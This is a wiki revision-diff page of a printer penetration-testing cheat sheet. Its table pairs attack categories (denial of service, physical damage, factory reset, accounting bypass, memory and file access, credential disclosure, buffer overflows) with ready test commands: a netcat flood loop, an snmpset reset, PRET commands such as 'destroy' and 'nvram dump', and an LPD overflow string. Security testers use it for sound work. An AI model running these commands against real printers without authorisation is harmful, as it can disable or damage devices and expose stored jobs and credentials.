Difference between revisions of "Printer Security Testing Cheat Sheet"
From Hacking Printers
(Created page with "{| class="wikitable" |- ! Category !! Attack !! Protocol !! Testing |- | rowspan="5" | Denial of service | Transmission channel || TCP || <code>while true; do nc pr...") |
|||
| Line 1: | Line 1: | ||
| + | To systematically check for vulnerabilities in a printing device, first perform a generic network [http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html assessment] and check for printer-specifc web based information leaks using [[Praeda]]. Then, use the following cheat sheet to quickly find flaws in [[Fundamentals#Printer Control Languages|printer languages]] and [[Fundamentals#Network printing protocols|network protocols]]. | ||
| + | |||
| + | |||
{| class="wikitable" | {| class="wikitable" | ||
|- | |- | ||
Revision as of 15:42, 23 January 2017
To systematically check for vulnerabilities in a printing device, first perform a generic network assessment and check for printer-specifc web based information leaks using Praeda. Then, use the following cheat sheet to quickly find flaws in printer languages and network protocols.
| Category | Attack | Protocol | Testing |
|---|---|---|---|
| Denial of service | Transmission channel | TCP | while true; do nc printer 9100; done
|
| Document processing | PS | PRET commands: disable, hang
| |
| PJL | PRET commands: disable, offline
| ||
| Physical damage | PS | PRET command: destroy
| |
| PJL | PRET command: destroy
| ||
| Privilege escalation | Factory defaults | SNMP | snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6
|
| PML | PRET command: reset
| ||
| PS | PRET command: reset
| ||
| Accounting bypass | TCP | Connect to printer directly, bypassing the print server | |
| IPP | Check if you can set a username without authentication | ||
| PS | Check if PostScript code is preprocessed on print server | ||
| PJL | PRET command: pagecount
| ||
| Fax and Scanner | multiple | Install printer driver and (ab)use fax/scan functionality | |
| Print job access | Print job retention | PS | PRET command: capture
|
| Print job manipulation | PS | PRET commands: cross, overlay, replace
| |
| Information disclosure | Memory access | PJL | PRET command: nvram dump
|
| File system access | PS | PRET commands: ls, get, put, …
| |
| PJL | PRET commands: ls, get, put, …
| ||
| Credential disclosure | PS | PRET commands: lock, unlock
| |
| PJL | PRET commands: lock, unlock
| ||
| Code execution | Buffer overflows | PJL | PRET command: flood
|
| LPD | ./lpdtest.py printer in "`python -c 'print "x"*3000'`"
| ||
| Firmware updates | PJL | Flip a bit, check if the modified firmware is still accepted | |
| Software packages | multiple | Obtain an SDK and write your own proof-of-concept application |
